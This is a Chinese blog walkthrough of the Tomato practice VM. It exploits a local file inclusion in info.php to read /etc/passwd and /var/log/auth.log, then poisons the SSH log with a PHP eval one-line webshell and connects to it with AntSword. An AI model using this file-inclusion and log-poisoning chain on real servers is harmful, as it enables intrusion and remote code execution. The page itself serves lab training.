当前位置: 首页 > article >正文

Tomato靶机攻略

将tomato改为NAT模式

主机ip

arp-scan -l

 扫描端口,发现ssh服务端口从22改为2211

扫描目录 

 

 发现http://192.168.31.134/antibot_image/  访问

 查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

 在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

 

 通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

 info.php?image=/var/log/auth.log

 

 使用ssh登录,看日志里会不会出现记录

 发现日志中有记录

 使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

 

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接


http://www.kler.cn/a/582521.html

相关文章:

  • 【深度学习】图像卷积
  • Jupyter Notebook 全平台安装与配置教程(附Python/Anaconda双方案)
  • pytest数据库测试文章推荐
  • ‌Visual Studio Code(VS Code)支持的编程语言
  • 011-base64
  • AI概率学预测足球大小球让球数据分析
  • InternVL:论文阅读 -- 多模态大模型(视觉语言模型)
  • python之数据处理的安全(链家)
  • Ubuntu conda虚拟环境不同设备之间迁移
  • PHP前后开发纪录
  • 【C++初阶】string①:管理char的字符数组是一个模版(快速上手使用)
  • Spring Boot集成HikariCP:原理剖析与实战指南
  • 【蓝桥杯单片机】第十一届省赛
  • MATLAB 控制系统设计与仿真 - 24
  • KVM制作Ubuntu 22.04.5系统qcow2类型镜像
  • 下一代AIGC一站式商业解决方案Chat Nio
  • 【反无人机目标检测】DRBD-YOLOv8
  • react实现一个列表的拖拽排序(react实现拖拽)
  • 简单易懂Modbus Tcp和Rtu的异同点
  • 神经网络完成训练的详细过程